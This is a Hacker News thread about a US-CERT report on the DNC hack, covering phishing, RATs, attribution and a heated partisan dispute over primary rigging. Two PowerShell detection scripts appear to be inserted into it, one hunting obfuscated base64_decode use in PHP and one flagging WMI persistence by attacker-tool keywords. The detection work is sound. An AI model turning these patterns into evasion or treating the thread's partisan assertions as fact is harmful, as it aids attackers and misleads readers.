Technical report on DNC hack [pdf] (us-cert.gov)
456 points by jbegley on Dec 29, 2016 | 450 comments



I have looked through the report. The only useful information was a brief description of attack methods; everything else looks like a list of general recommendations one can find on the OWASP website.

As I understand from the report, the main methods used were:

- sending emails with executable files that victims for some reason executed

- phishing

So, they used script kiddie level tools anyone could use (and they are cheap; you don't have to buy expensive zero-day exploits on a black market). But of course this could be done intentionally so it looks amateur-ish.

These attacks could be easily mitigated. First, the OS and applications should not run unknown files from the Internet (because some people have got used to double-clicking on everything they get in email); second, we should start using physical cryptographic keys instead of passwords. Common people cannot handle passwords; they either make easily guessed passwords or enter them everywhere without thinking. I hate passwords too because they are hard to remember (and please don't suggest that I should download some software and upload my passwords to a "cloud" in an NSA-controlled country).

By the way, iOS is the only popular operating system I know that doesn't allow executing files downloaded from the web or from emails. Apple did it the right way.

The report also contains a pretty useless firewall rule named "PAS TOOL PHP WEB KIT FOUND" that can be used to search for malware in PHP files. It is interesting that they have replaced the digits in the 'base64_decode' function name with a regexp, as if there were any other similar functions.
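To show what a string-and-pattern check over PHP files looks like in practice, here is an added PowerShell example (not the report's rule and not its regex): it flags base64_decode whether it is written literally or assembled at runtime from fragments, run over three constructed sample files. The pattern set and the samples are assumptions made for this example.

```powershell
# Added example, not the report's YARA rule: scan PHP files for base64_decode
# both as a literal name and as a name built at runtime from pieces, which a
# plain string match for "base64_decode" would miss.
function Find-Base64DecodeUse {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Path)

    # Assumed patterns written for this example; illustrative, not a vetted signature set.
    $patterns = [ordered]@{
        'literal'  = 'base64_decode\s*\('                                   # base64_decode(...)
        'arith'    = "'base'\s*\.\s*\(\s*\d+\s*\*\s*\d+\s*\)\s*\.\s*'_de'\s*\.\s*'code'"  # 'base'.(32*2).'_de'.'code'
        'split'    = "'base6'\s*\.\s*'4_decode'"                             # 'base6'.'4_decode'
        'reversed' = "strrev\s*\(\s*'edoced_46esab'\s*\)"                    # strrev('edoced_46esab')
        'dyncall'  = '\$\w+\s*\(\s*\$_(?:COOKIE|GET|POST|REQUEST)\b'         # $fn($_COOKIE[...]): dynamic function name on request data
    }

    Get-ChildItem -Path $Path -Recurse -File -Filter '*.php' | ForEach-Object {
        $text = Get-Content -Path $_.FullName -Raw
        if ([string]::IsNullOrEmpty($text)) { return }   # skip empty files
        foreach ($name in $patterns.Keys) {
            $m = [regex]::Matches($text, $patterns[$name])
            if ($m.Count -gt 0) {
                [pscustomobject]@{
                    File    = $_.FullName
                    Pattern = $name
                    Hits    = $m.Count
                    Sample  = $m[0].Value
                }
            }
        }
    }
}

# Constructed samples (not real webshell code) written to a temp folder so the
# scanner can be run offline. PHP evaluates 'base'.(32*2).'_de'.'code' to "base64_decode".
$dir = Join-Path ([IO.Path]::GetTempPath()) ('phpscan-' + [guid]::NewGuid().ToString('N'))
New-Item -ItemType Directory -Path $dir | Out-Null
Set-Content -Path (Join-Path $dir 'clean.php')   -Value '<?php echo htmlspecialchars($_GET[''q'']); ?>'
Set-Content -Path (Join-Path $dir 'literal.php') -Value '<?php $d = base64_decode($_POST[''d'']); echo strlen($d); ?>'
Set-Content -Path (Join-Path $dir 'obf.php')     -Value '<?php $f = ''base'' . (32*2) . ''_de'' . ''code''; $x = $f($_COOKIE[''c'']); ?>'

# clean.php produces no rows; literal.php matches 'literal'; obf.php matches 'arith' and 'dyncall'.
Find-Base64DecodeUse -Path $dir | Format-Table -AutoSize
Remove-Item -Recurse -Force $dir
```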


That's the real absurdity of this debacle to me.

Many of the whitepapers that I read about the DNC hack listed the attack's "sophistication" as proof that it came from a state actor, yet it was the most routine, simple attack conceivable. No rootkits, no 0 days, just simple phishing and social engineering.


The report just didn't get into that much detail but they did say:

"the code delivers Remote Access Tools (RATs) and evades detection using a range of techniques."

A "range of techniques" includes things like rootkits.

>No rootkits,

The attackers did use stealthy persistence techniques often called 'rootkits'.

"the SeaDaddy implant developed in Python and compiled with py2exe and another Powershell backdoor with persistence accomplished via Windows Management Instrumentation (WMI) system,[..] The Powershell backdoor is ingenious in its simplicity and power" [0]

>no 0 days

The same group used six 0-days in 2015. Either they didn't need to use them in this attack or they used them and deleted the evidence. Sednit is APT28; see quote below:

"One of the striking characteristics of the Sednit group is its ability to come up with brand-new 0-day vulnerabilities regularly. In 2015, the group exploited no fewer than six 0-day vulnerabilities" [1]

>yet it was the most routine, simple attack conceivable.

The attack involved multiple pieces of custom written software and carefully researched spearphishing; the attackers spent time and effort to hide their tracks, maintain persistence and exfil data without detection. This level of effort and time does not qualify as routine; some intelligence agencies can't even write their own RATs.

[0]: https://www.crowdstrike.com/blog/bears-midst-intrusion-democ...

[1]: http://www.welivesecurity.com/wp-content/uploads/2016/10/ese...


Can't one just buy a RAT?

Also, the WMI thing they describe doesn't look like a rootkit, more like a cron analogue for Windows. I.e. on Unix it would be like installing a command inside crontab. That's not what is usually called a rootkit - a tool that is designed to conceal its presence (and other tools' presence) from regular OS tools.
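Since the WMI persistence quoted above and the cron comparison here both come down to a registered filter-consumer pair in the root\subscription namespace, here is an added PowerShell example (not from the report, CrowdStrike, or any product) that enumerates those registrations on a Windows host and flags consumers that run commands or scripts. It assumes Windows PowerShell with Get-WmiObject and an elevated session; the keyword list used for the Suspicious column is an assumption made for this example.

```powershell
# Added example (not from the report or any vendor tool): enumerate WMI permanent
# event subscriptions, the persistence mechanism discussed in the thread, and flag
# the bindings whose consumer executes a command or script. Read-only; run elevated
# in Windows PowerShell (Get-WmiObject is not available in PowerShell 7).
function Get-WmiEventSubscription {
    [CmdletBinding()]
    param(
        # Assumption: the local host by default; any value Get-WmiObject -ComputerName accepts works.
        [string]$ComputerName = '.'
    )

    $ns = 'root\subscription'
    $filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter -ComputerName $ComputerName)
    $consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer -ComputerName $ComputerName)
    $bindings  = @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding -ComputerName $ComputerName)

    # Binding references are WMI paths such as  __EventFilter.Name="MyFilter"  ; extract the Name.
    function Get-RefName([string]$Ref) {
        if ($Ref -match 'Name="([^"]*)"') { return $Matches[1] } else { return $Ref }
    }

    foreach ($b in $bindings) {
        $fName = Get-RefName $b.Filter
        $cName = Get-RefName $b.Consumer
        $f = $filters   | Where-Object { $_.Name -eq $fName } | Select-Object -First 1
        $c = $consumers | Where-Object { $_.Name -eq $cName } | Select-Object -First 1
        $class = [string]$c.__CLASS   # '' if the binding points at a missing consumer

        # What the consumer does when the filter's WQL query fires: a command line for
        # CommandLineEventConsumer, inline script for ActiveScriptEventConsumer, else nothing to show.
        $payload = switch ($class) {
            'CommandLineEventConsumer'  { "$($c.ExecutablePath) $($c.CommandLineTemplate)".Trim() }
            'ActiveScriptEventConsumer' { if ($c.ScriptText) { $c.ScriptText } else { $c.ScriptFileName } }
            default                     { $null }
        }

        # Heuristic only (an assumption for this example): interpreters, encoded PowerShell
        # and download helpers in a consumer payload deserve a closer look.
        $suspicious = $payload -and ($payload -match 'powershell|-enc|-e |FromBase64String|DownloadString|wscript|cscript|mshta|regsvr32|rundll32|cmd(\.exe)?\s+/c')

        [pscustomobject]@{
            Computer      = $ComputerName
            FilterName    = $fName
            TriggerQuery  = $f.Query          # WQL event query, e.g. a timer or process-start event
            ConsumerName  = $cName
            ConsumerClass = $class
            Payload       = $payload
            Suspicious    = [bool]$suspicious
        }
    }
}

# Usage: everything first, then only the flagged rows. Many Windows builds ship a benign
# 'SCM Event Log' NTEventLogEventConsumer binding; compare against your own baseline rather than assuming.
Get-WmiEventSubscription | Format-List
Get-WmiEventSubscription | Where-Object Suspicious
```

Because every entry lives in an enumerable WMI namespace, this is exactly the cron-like, non-hidden persistence the comment above describes; it only goes unnoticed when nobody looks.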


You can buy RATs. The several RATs used in this campaign were never for sale.

For example the RAT named X-Agent was one of several used in the DNC hack. It has never been put up for sale and it was used in previous Russian intelligence operations (for example tracking Ukraine artillery[0]).

>That's not what is usually called a rootkit

It doesn't appear that anyone has reverse engineered the PC version of X-Agent, but the Android variant (which may be very different from the one used in the DNC hack) does take some steps to hide itself. Granted, nothing suggests anything like kernel syscall hooking, but those sorts of rootkit techniques are overrated because they leave obvious and detectable patterns of compromise.

[0]: https://blog.trendmicro.com/trendlabs-security-intelligence/...


So essentially someone hacked the DNC, and it's "advanced" because some custom software was written just for this particular target ?

I've written custom software (which was a lot harder to find than some python WMI hooks) for hacking a lot lower profile organisations. I've consulted for organisations that were hacked by Chinese hackers for bitcoin ransom that had custom software written too. I mean, high profile target, more effort can be expected. It does not mean the government is involved (although a lot of hacking groups seem to have government sidelines in China, though it does not appear to be their primary activity. I mean unless the Chinese government is itself into bitcoin ransoming).

But more seriously, if a component of our government that is this central to our democracy can be hacked by sending emails "open this exe", then ... I mean seriously. Sorry to say, but if that works, you deserve what happens. Is this really the level of competency in the people that are currently organising the government ?

Also the main thing this report does is validate that the information leaked to the press is indeed true (I figured as much, I mean why put so much effort into fighting fake news unless the real target information is not fake ?).

So Hillary and the DNC is in fact in the pocket of wall street. She DID use the DNC organisation to sabotage Bernie Sanders. There are in fact foreign donors to Hillary and the DNC that are illegal under rules that Hillary's government department is supposed to enforce ... this report mostly confirms that this is indeed the view that the top of the DNC has.


The sophistication is not evidence of government involvement, the lack of sophistication is not evidence that a government was not involved.

Certainly malware which costs serious resources to develop, like stuxnet, says something about the capabilities of the attacker. Given that at the high end of the resource spectrum it is mostly governments, resources required are suggestive of a government, but resources are not conclusive in and of themselves.

The attribution of the DNC hack to APT28 and APT29 was not based on its sophistication but on the similarity to the methods used, tradecraft fingerprints, and the sharing of C&C servers to past attacks.


Apparently John McAfee disagrees with you:

https://www.youtube.com/watch?v=aDTKKmBjlwE#t=5m40s


Watched, didn't hear anything that contradicts what I wrote. Can you be more specific?

The closest I can find is when McAfee says: "If it looks like the Russians it isn't the Russians." I said "It looks like the Russians." These statements don't contradict each other.

We do disagree on attribution, but I haven't discussed that in this thread. He is radically skeptical about ever attributing any state sponsored hacking, although in the same interview he does attribute Stuxnet to the US/Israel and the OPM hack to China.


Let's keep the discussion to the technical aspects of the attack. The democrat vs republican antagonism doesn't belong on hacker news.


Then hacker news doesn't belong in human company.


> Is this really the level of competency in the people that are currently organizing the government ?

  Garrett Graff 
  ... Hillary seems to actually be a very persnickety technology user. She is 
  not very comfortable with most technology, only liked to use a BlackBerry and,
  more specifically, only liked to use a specific type of increasingly older and
  more out-of-date BlackBerry.

  She doesn't know how to use a desktop computer. She--

  Sean Cole 
  Wait, wait, wait. Back up. Back up. She doesn't know how to use a
  desktop computer.

  Garrett Graff 
  Hillary Clinton, the Democratic presidential nominee in 2016,
  does not know how to use a desktop computer, according to multiple sources
  interviewed by the FBI.

  Sean Cole 
  How is that possible?

  Garrett Graff 
  The short answer is, I don't know...

https://www.thisamericanlife.org/radio-archives/episode/601/...


Just to add to this, Crowdstrike is on the DNC's payroll. Any conclusions they provide should either be met with skepticism or discredited to a degree.


The Crowdstrike co-founder and CTO is also a Senior Fellow at a think tank that seems particularly giddy about the new Cold War: http://www.atlanticcouncil.org/about/experts/list/dmitri-alp...


"Many breach announcements this year pointed to a “sophisticated attacker” as a narrative of their issue. This usually is followed up by criticism when an initial means of their compromise is revealed.

Most breaches begin with spear phishing, commodity exploits, a leaked key, or some other obvious or preventable detail. However, this is almost never the “sophisticated” aspect of a breach worth talking about. It’s easy to point at an embarrassing vector and dismiss the rest of an attack. Thus, do not judge an adversary by the vector they’ve chosen.

An adversary may show you what “sophistication” means after advancing from their beachhead."

* https://medium.com/starting-up-security/learning-from-a-year...


Valid point, but I should clarify my original comment: I don't find either aspect of the attack--the entry or the payload--to be particularly sophisticated.

Everything I've read indicates the bulk of work was done by Powershell scripts, along with a backdoor process running in the open. If you told me that the backdoor was a kernel level rootkit or something similar then I could get onboard, but as it stands I don't think the attack's complexity is a solid argument for "Russia did it"


The main arguments might not be technical. The political emails are pretty boring stuff for an outsider, so it should be some government or politician bothering to get them.

I also remember that some gmail accounts of people from DNC staff were hacked. Gmail probably has logged what IP addresses were used when logging in with stolen passwords and they could be used as a hint too (though most probably they point to cheap VPS bought by some anonymous person or Tor node, I doubt anyone would use a stolen password from their real IP address).


Nobody except complete amateurs uses their own computer to do hacking. There are thousands if not millions of compromised computers in the AWS cloud and similar hosting services that in turn work as robot-hackers to compromise other sites. It is like a self-building hacking network where each cell works to infect other cells. So the attack, if it was an attack at all (as the document does not have any evidence that it was one), was unlikely to be running from a real IP but from a random AWS instance registered by some junior software developer from India who bought it to deploy a pet project that was hacked without him even knowing, weeks before the event.


Who else could have forced the DNC to rig the primaries? It's very clear from the collusion between CNN and the Hillary campaign that state level actors were involved.


Please don't spread fake news about primary rigging, even if tongue-in-cheek. Stick to discussing the article.


How is primary rigging fake news? It's very obvious from reading the WikiLeaks emails that the DNC was brazenly biased towards Hillary and against Sanders.


Because there's absolutely no evidence that it was rigged? Just because the DNC preferred the lifelong Democrat to the lifelong independent (who could have guessed that?) doesn't mean they couldn't still have operated a fair primary.


The emails show that Sanders was more or less a token opponent kept on a leash and kept in line. Remember also how they cut Sanders out of the DNC voting data. There were no big name Democrats running against Hillary.

They also sucked all the money from the state level campaigns into Hillary's campaign, hurting the entire party when they lost after spending so much money trying to force Hillary through.

https://wikileaks.org/podesta-emails/emailid/22224

https://wikileaks.org/dnc-emails/emailid/11056

https://wikileaks.org/dnc-emails/emailid/5477

https://wikileaks.org/podesta-emails/emailid/24440

https://wikileaks.org/podesta-emails/emailid/10669#efmAO0APK...

https://wikileaks.org/podesta-emails/emailid/5688

https://wikileaks.org/dnc-emails/emailid/9999%20

https://wikileaks.org/podesta-emails/emailid/5423

https://wikileaks.org/dnc-emails/emailid/7643

https://wikileaks.org/podesta-emails/emailid/44131


What specifically did the DNC do to keep Sanders on a leash? My memory of the primaries is far different, with Sanders suing the DNC over access to NGP VAN (which the DNC had cut off until the Sanders campaign showed they had deleted their copies of Clinton's data), loudly complaining about the DNC following the existing rules at the Nevada Convention (http://www.politifact.com/nevada/statements/2016/may/18/jeff...), and generally loudly making unfounded allegations of rigging. Sanders was clearly unleashed, if not unhinged (though the cranky old progressive personality is what I like about him, in much the same way that libertarians are drawn to cranky old Ron Paul).

> They also sucked all the money from the state level campaigns into Hillary's campaign.

You're misreading the Politico article about the Hillary Victory Fund. In that article, the DNC said it was using the initial money to set up common infrastructure for the state parties to use. The money that was supposed to go to the state parties did eventually go to the state parties as you can see here: https://www.opensecrets.org/jfc/summary.php?id=C00586537. To refresh your memory, the first [FEC maximum contribution amount] donated by an individual to the Hillary Victory Fund would go to her primary campaign, the next [max amount] would go to her general election campaign, the next [max amount] would go to the DNC, and the rest would be distributed among the state parties.

Also, I'm curious: whom would you consider a big name Democrat worthy of challenging Clinton not as a token opponent?


Donna Brazile and DWS were respectively fired from CNN and resigned over the corruption.


Donna Brazile wasn't DNC chair until after the primaries were over, so how would she be an example of the DNC rigging the primaries for Clinton?

Wasserman-Schultz resigned to get out of the spotlight, which she believed would put more attention on Clinton for the general election.

We have the DNC's full email history here. Surely if they rigged the primary for Clinton, there would be at least one email showing it.


Donna Brazile was fired for leaking debate questions to the HRC campaign.


> Donna Brazile wasn't DNC chair until after the primaries were over, so how would she be an example of the DNC rigging the primaries for Clinton?


Because she sent the emails to the Hillary Campaign. And then was surprise surprise, appointed to the DNC Chair.

You know instead of the Hillary campaign saying, no no, you shouldn't appoint her, we have evidence that she is corrupt, here's the evidence.

And then after the evidence came to light the DNC was like, oh that's fine.


Once again, how is that evidence of the DNC rigging the primaries for Clinton against Sanders? Do you admit that no such evidence exists?


No I don't, to me the emails and the resignations are both evidence and an admission of guilt, to you it might not be.

I hope that Hillary and the DNC are able to get their day in court so the evidence can be heard by a jury of their peers rather than the court of public opinion.


> To me the emails and the resignations are both evidence and an admission of guilt.

Be specific. Which emails are evidence of guilt? None of the emails I've seen have shown any evidence of the DNC rigging the primaries. Why would the resignations be evidence of guilt if the stated reasons for resignation are just as plausible?

Do you realize how much you sound like a conspiracy theorist?


"Rigging", at least as I read it, doesn't imply cheating - it can just imply that the system is unbalanced or all candidates are not on a level playing field.

For example, if I had to compete against someone in a drawing competition, and one of the judges was the parent of my competitor, and that judge has gone out of his way to train and groom his child for years for this competition, I may lament that the contest is rigged, even if the judge doesn't stuff the ballot box.


Why is there both a judge and a ballot box in your analogy? In the primaries, there were only ballot boxes, and Clinton got almost 30% more ballots from normal people outside of the DNC than Sanders. It was a landslide so large that the media had to construct a horse race story just to try to keep it interesting.

The DNC had "groomed" Clinton insofar as she had run in the primaries before and was familiar with the rules. She didn't receive any special treatment from the DNC during the primaries as far as their emails showed.


Because the judges put their votes in a ballot box. Or because stuffing a ballot box is an idiomatic phrase.


Rigging implies fraud, deception, or dishonesty, not just unbalanced.

https://www.merriam-webster.com/dictionary/rigged

See sense 3

1. to manipulate or control usually by deceptive or dishonest means <rig an election>

2. to fix in advance for a desired result <rig the contest>

Edited to add second part of sense 3.


Why did you skip the second part of sense 3, which is "to fix in advance for a desired result"?


I don't see that it adds anything to contradict the idea that rigging is only something "unbalanced" and not connoting deceit. "Fix in advance" is an example of fraud. I have no issue with including it in my comment, and have updated it to do so.

I'm not sure why you would think otherwise, though if you're implying that the example of extra, specialized training you provided above is an example of "fix in advance", I disagree. To "fix in advance" would mean that the outcome is predetermined, such as by bribes. This sense of fix is here:

https://www.merriam-webster.com/dictionary/fix

7b. to influence the actions, outcome, or effect of by improper or illegal methods <the race had been fixed>

If you have some other meaning implied by your comment, please explain. I find I'm a terrible mind reader.


But your facts and reasoning regretfully interrupts the circle jerk of the Bernie bros who are convinced their democratic socialist was on the brink of revolutionizing the American political system and finally delivering us to a Denmarkian utopia.

Never mind the fact that Sanders was treated much more gently by the Clinton campaign than Obama was in '08, the only salient fact is that minority voters should have yielded their preference for a man who has spent 30+ years in Washington and yet has largely failed to build any power base.


I'm confused by the last sentence. Are you suggesting that more minority voters went for Sanders over Clinton in the primaries? I had thought the exact opposite.


It's sarcasm... the paranoid Sanders voters screaming that the election was rigged often 'forget' (find unacceptable/truly are clueless) that minority voters are the 800lb gorilla of the Democratic Party. In 08 they wanted Obama, and that's who it got. In 16 they wanted hrc and that's who it got. They throw around Clinton's pop vote win as if it showed our system is broken, all while genuinely believing she beat Sanders by cheating, conveniently ignoring the fact that she beat him by a larger margin.


I have no doubt that Hillary Clinton would have won the primary regardless of the DNC "meddling" in the primary, but I do feel that they would have a more unified DNC had there not been news of the DNC backing HRC before the primaries had even finished.


What "meddling" did the DNC do in the primary? How were they were backing her before the primaries finished?


> In a May 2016 email chain, the DNC chief financial officer (CFO) Brad Marshall told the DNC chief executive officer, Amy Dacy, that they should have someone from the media ask Sanders if he is an atheist prior to the West Virginia primary.[46][47]

> high-ranking DNC officials discussed the possibility of making Sanders' religion a campaign issue in southern states

Did they do so? If so, that's clear meddling. If not, it shows intent of meddling.

> Paustenbach suggested that a past incident could be used to promote a "narrative for a story, which is that Bernie never had his act together, that his campaign was a mess."

Again, suggestion to do acts of meddling but not clear if they went through with it.

> Wasserman Schultz resigned as DNC chair after the leak, and was replaced by Donna Brazile and the Democratic National Committee issued an apology to Sanders.[52] Speaking on CNN, Sanders responded to the email leak: "...it is an outrage and sad that you would have people in important positions in the DNC trying to undermine my campaign.

Regardless of whether the intended meddling happened or not, it is clear that even the party itself knows that they were in the wrong.


> Did they do it?

They did not bring up Sanders's religion, so there was no meddling there.

> Paustenbach suggested that a past incident could be used to promote a "narrative for a story, which is that Bernie never had his act together, that his campaign was a mess."

This is out of context. Sanders was attacking the DNC in the media for following pre-agreed-upon rules in Nevada. They were discussing how to respond to those frankly ridiculous attacks. http://www.politifact.com/nevada/statements/2016/may/18/jeff...

> Regardless of whether the intended meddling happened or not, it is clear that even the party itself knows that they were in the wrong.

To recap, we have their full email history here, yet we still can't find a single instance of them acting to rig the primaries against Sanders. Wasserman-Schultz resigned to get out of the spotlight, which she believed would put more attention on Clinton for the general election.


I was referring to the emails that showed clear favoritism for Clinton over Sanders. I put meddling in quotations because it wasn't necessarily actual instances, but rather the way the DNC treated one of their candidates that left a sour taste in many Sanders supporters' mouths.

That led to a lot of acquaintances of mine that supported Sanders to continue bashing Clinton after the primaries were already over, when it would have been really helpful for the Democratic party to have been unified throughout all of that.


I think that's the exact delusion I'm referring to. I think many Sanders supporters genuinely believe that since they have a clear preference for a candidate, that their preference is the only valid option and other people simply aren't allowed to make their own choice.

Again, I refer to them as delusional because the '16 primary fight was about 1/3 as dirty as the '08 primaries, and somehow Sanders supporters feel being treated gently isn't good enough; what they expected was a clear majority of Democratic voters to simply hand over the reins of the Democratic Party. They truly expected politics to revolutionize itself because of Sanders' presidential run, and somehow tricks would not be a part of politics instantly and forevermore.

I think my big takeaway regarding the primaries is that most 'progressive' Sanders voters simply wanted to hurt the American establishment, and if they couldn't do it with Bernie they wanted to cry, pick up their ball, and go home.


Biased? Yes, the DNC would obviously prefer a Democrat to an independent. Rigged? There was no evidence of any rigging outside of fake news.


Here you're using a common everyday definition of the verb "rig". Observe that this definition excludes e.g. publicizing a political candidate's banal episodes of tawdriness to the scrutiny of voters, so it's not the definition in wide use in USA news media over the last month or so.


I'm using rig in a broad sense. The DNC didn't publicize banal episodes of tawdriness to the scrutiny of voters. If you're talking about the NGP VAN data access, that hit the news on 12/17/2015 when Michael Briggs (Sanders's communications aide) talked about it to BuzzFeed, and the story blew up on 12/18 when the Sanders campaign filed a lawsuit against the DNC over temporarily shutting down their access to the system until they could show that they had deleted any copies they might have had of the Clinton campaign's data.


That's the point. Rigging an election consists of stuffing ballot boxes or intimidating voters or something like that. Phishing John Podesta is the sort of thing that used to be called "opposition research" (assuming arguendo that the phishing party actually cared who won).


I'm sorry, but I don't see what phishing Podesta has to do with fleitz's claim that the DNC rigged the primaries.


Perhaps you've missed the last month of news media output; congratulations! There has been a great deal of innuendo about hackers rigging our election under V. Putin's direct command. Here's the top of Google News just now when I checked: [0] This fine polemic starts with a lamentation of Podesta's email security, mumbles through some baseless speculation about fake news and voting machine hacks, then admits to that baselessness before winding up to this breezy pronouncement: "The bottom line is that as dangerous as actual attempts to compromise voter outcome are, the perception that voting results are flawed is also capable of delegitimizing the democratic process. If citizens believe the vote has been rigged, then why bother voting at all?"

One might note that this author stops short of saying rather than merely insinuating that "publishing emails" constitutes "rigging an election", but he sure wrote a lot of words in that effort.

[0] http://www.cnbc.com/2016/12/29/russia-election-hack-obama-re...


I haven't missed that at all. It just has absolutely nothing to do with fleitz's claim that the DNC rigged the primaries.

Maybe you are not an American. Do you know what the primaries are?


Does the definition of "rig" change from the primaries to the general?


We were discussing fleitz's claim that the DNC rigged the primaries for Clinton. I assert that they didn't. I'm still not sure what you're claiming or whom you think you are disagreeing with.


Imaginary friends don't have legitimate interests.


>> "An adversary may show you what “sophistication” means after advancing from their beachhead."

Sure, that's obviously true in general, but given the current absence of evidence of "sophistication," there is no reason to assume its presence.


Journalists routinely do that - underline that whatever malfeasance is done, the perpetrator is not a usual random criminal but an especially heinous one, and thus this story is worth your attention.

With computer crime it's especially obvious because most journalists don't know enough to understand what's hard and what's not, so they take the word of law enforcement, and law enforcement has big motivation to make it sound as bad as possible, since it enhances their significance and their success for catching one. "I've caught a sophisticated hacker" sounds better than "I've found a 13-year old kid that sent someone an email saying 'give me your password' and the poor shmoe was silly enough to do just that".

So there won't be a lot of reports about catching unsophisticated hackers. Usually it's always "highly sophisticated" ones.

OTOH, I think the actual (claimed) proof was the use of a certain bit.ly account etc., not sophistication per se.

Also, it looks like there were at least 3 attacks on the DNC, and phishing was only involved in one. Maybe the whitepapers talked about the other ones.


This is the spear phishing email that we have every reason to believe got Podesta that happened not long before the dump ends:

https://wikileaks.org/podesta-emails/emailid/34899

This is the stats page for the bit.ly phishing link from that email showing two clicks in the right time frame:

https://bitly.com/1PibSU0+

It's not rocket science to dump the emails out of a Gmail account:

https://support.google.com/accounts/answer/3024190?hl=en

But the Podesta leaks aren't the same as the DNC leaks, which Wikileaks has long claimed came from an insider who was upset by their treatment of Bernie. It's also interesting to note that even if the DNC was hacked, that doesn't actually prove where the information given to Wikileaks came from.

Given how careless they are in other regards, I have to think that any insider that wants it can get their data. Just read the PDF on this email to see how Colin Powell & Hillary Clinton treat OPSEC: https://wikileaks.org/clinton-emails/emailid/30324

"When I asked why not they gave me all kinds of nonsense about how they gave out signals that could be read by spies, etc. Same reason they tried to keep mobile phones out of the suite. I had numerous meetings with them. We even opened one up for them to try to explain to me why it was more dangerous than say, a remote control for one of the many tvs in the suite. Or something embedded in my shoe heel. They never satisfied me and NSA/CIA wouldn't back off. So, we just went about our business and stopped asking. I had an ancient version of a PDA and used it. In general, the suite was so sealed that it is hard to get signals in or out wirelessly."

Also, the DNC has long been planning to reach for the Putin angle:

"Best approach is to slaughter Donald for his bromance with Putin, but not go too far betting on Putin re Syria. Brent"

https://wikileaks.org/podesta-emails/emailid/25651


The sophistication cited by CrowdStrike was the actions taken on the DNC servers, not the initial penetration.


Exactly, why burn zero-days when you're targeting a technologically unsophisticated adversary with a huge organizational attack surface?

Sure, HDD firmware hacks are cool, but in terms of R&D time far less efficient if you're willing to spam attempts to get in the front door. And I'd say they chose the appropriate level of sophistication given the success of the penetration.

The DNC isn't exactly an air-gapped Iranian nuclear centrifuge.


> Exactly, why burn zero-days when you're targeting a technologically unsophisticated adversary with a huge organizational attack surface?

Then how is this evidence of a 'state-sponsored actor'?

And how did the narrative of this story ever get derailed from what it should have been, which was, "The DNC, and John Podesta in particular who had both his gmail and his Twitter accounts hacked, are incompetent", to "this is Russian interference in a US election"?


That some people are unfamiliar with computer security is not news. I have known a fair number of big-shot executives and politicians, all of whom I'd expect would click on suspicious links in their email (if they read the email) and double-click on attachments.

The news is why that particular person was targeted.


> The news is why that particular person was targeted.

For which no proof is being presented. Lots of stuff about hacking tools, nothing really about identifying hackers. Lots of anonymous high level sources offering vague assurances and excuses for why we can't present info...


I can think of two general possibilities. Either (1) there is a conspiracy to mislead the public or (2) showing the proof would reduce our security in some way. I find the latter explanation more plausible.


> this is Russian interference in a US election

Although the media and many in politics are saying this, it's plainly false. There is no serious claim that the Russians interfered in our election.

The claims are that the Russians interfered in a presidential campaign. There's a huge difference between the process of campaigning, versus the election process of casting and counting votes.

Sowing this confusion is useful on at least two levels. Most obviously, it serves to undermine the legitimacy of the incoming President. But it's also useful in setting stage for future debate about campaign finance laws. It's important in that debate to keep separate the ideas of election - which the government must protect to ensure its faithfulness to the voters - versus the idea of campaigning, which the government may never interfere with, which is the primary purpose of the First Amendment.


It requires some serious mental gymnastics to split those hairs.


There are a lot of people who would benefit from the latter conclusion and not a lot of people who would benefit from the former.


> not a lot of people

There are many Republicans.


Republicans as such don't have a lot of motivation to prove DNC incompetence by them being hacked, now that Republicans have won the election; that would be a much larger claim that the DNC is less than competent than being hacked.


Your assertion does not persuade me.


[flagged]


I'd prefer something a bit sturdier than circumstantial evidence if we're going to accuse a nuclear superpower of cyber warfare.


And sometimes defectors drink polonium-210 and die from radiation poisoning.

The world doesn't come with nice "I did it" notes. You make the best decisions you can with the information you have.


Could you elaborate? Once you have a password shouldn't it be as easy as just downloading all the emails? Any email client should have the functionality built in.

edit: seeing some reports they used "sophisticated" SQL injection... okay...I mean for a lay person it seems sophisticated, sure. But for anyone in the industry it's one of the oldest and easiest tricks in the book.

I really suspect news sources are knowingly exaggerating about the sophistication of this "hack" in order to make up-play Russia's role and downplay the DNC's culpability.


You can read about the backdoors they used here:

https://www.crowdstrike.com/blog/bears-midst-intrusion-democ...

The summary: One used Powershell modules and Windows Scheduler to run scripts. Another used a combination of Twitter and public sites like Github/Dropbox for command and control.

In my opinion, neither is impressively sophisticated, and a skilled application developer could whip up something similar in a week or two. Using popular sites like Twitter/Dropbox for C&C has been common for years, and you can purchase similar backdoors/RATs for less than $100.

edit: Another interesting point from the link above: the two exploits stole exactly the same info once inside the DNC network. This would obviously be a big no-no for a sophisticated state actor as it doubles your chance of being compromised, but the author explains it away by claiming that Russia's intelligence agencies are disorganized and adversarial.


Your "summary" leaves out the key points. The SeaDaddy, X-Agent, and X-Tunnel tools used in these attacks have only been used by two groups, using the same control servers each time, on European, American, and World Anti-Doping Agency targets that the Russians had strong motive to attack, with some of the attacks being attributed to Russia by multiple other means.

If it turned out that Russia was not behind these attacks, the scale of the bad publicity for Crowdstrike, Fidelis, Palo Alto Networks, etc. would nearly put them out of business. Unlike you, they have skin in the game and don't make these claims lightly.


The problem with relying upon motive and established MO exclusively is that anyone is therefore capable of framing whomever they like.

This is the next generation of warfare, attribution is simply impossible. Even if there existed actual forensic evidence it could not be relied upon.

Reacting to purported attacks at face value will leave you like a 1-layer chess player, potentially acting on behalf of your adversary.


As I said above, the attribution does not rely solely on motive. All private security firms that analyzed the attack have attributed it to Russia, and they would not stake their reputations on such a flimsy argument.


all private security firms ? name one, please


I named three in my first comment above. There are also Mandiant (FireEye) and SecureWorks. Previous attacks with the same malware were attributed to Russia by Threatconnect and Microsoft, who calls the "Fancy Bear" group "Strontium."


> X-Tunnel

That one is more likely to be used by the Chinese: https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-...


That document is yet another example of laughably poor security analysis.

The Chinese implementation of the XTunnel protocol is in Java (the GitHub project is written in Java, and you can see an embedded JRE in your blog post's link to the Chinese tool in the strings here: https://cynomix.invincea.com/sample/e2101519714f8a4056a9de18...). The FancyBear implementation is not (no embedded JRE here: https://cynomix.invincea.com/sample/f09780ba9eb7f7426f93126b...).

If you want to see how professionals do it, take a look at https://www.eset.com/int/about/newsroom/research/dissection-....


